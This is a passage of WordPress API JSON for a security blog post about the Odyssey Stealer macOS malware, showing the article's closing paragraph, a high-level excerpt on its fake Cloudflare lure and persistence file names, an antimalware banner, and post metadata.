requests.<\/p>\r\n\r\n<p>The Odyssey Stealer serves as a stark reminder that the intersection of geopolitics and cybercrime continues to evolve, with threat actors leveraging technical capabilities to target high-value cryptocurrency assets while potentially advancing broader political agendas.<\/p>\r\n\r\n<p style=\"padding-top:15px;padding-bottom:15px;\"><a href=\"\/download\/antimalware\" rel=\"nofollow\"><img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"\/blogs\/wp-content\/uploads\/2022\/07\/env01.webp\" alt=\"Odyssey Stealer: Russian &amp;#8216;Love Trump&amp;#8217; Malware Replaces Ledger Live Crypto Wallet App\" width=\"798\" height=\"336\" class=\"aligncenter size-full\" title=\"\"><\/a><\/p>","protected":false},"excerpt":{"rendered":"<p>A new macOS malware campaign is targeting users through social engineering, masquerading as legitimate Cloudflare security verification. The Odyssey Stealer represents a significant escalation in Mac-targeted cybercrime, combining deceptive web pages with AppleScript-based data theft capabilities. Analysis of the malware reveals intriguing geopolitical elements, with persistence mechanisms using file names like com.love.russia.plist and staging directories [&hellip;]<\/p>\n","protected":false},"author":16,"featured_media":31104,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"content-type":"","_sitemap_exclude":false,"_sitemap_priority":"","_sitemap_frequency":"","footnotes":""},"categories":[17,15],"tags":[192,28,93,1360],"class_list":{"0":"post-31095","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-labs","8":"category-security-news","9":"tag-macos","10":"tag-malware","11":"tag-russian-hackers","12":"tag-stealer"},"featured_image_src":"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/06\/Odyssey-Stealer.jpg","author_info":{"display_name":"Dmytro Grydin","author_link":"https:\/\/gridinsoft.com\/blogs\/author\/grydin\/"},"_links":{"self":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts\/31095","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/users\/16"}],"replies":[{"embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/comments?post=31095"}],"version-history":[{"count":10,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts\/31095\/revisions"}],"predecessor-version":[{"id":31129,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts\/31095\/revisions\/31129"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/media\/31104"}],"wp:attachment":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/media?parent=31095"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/categories?post=31095"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/tags?post=31095"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}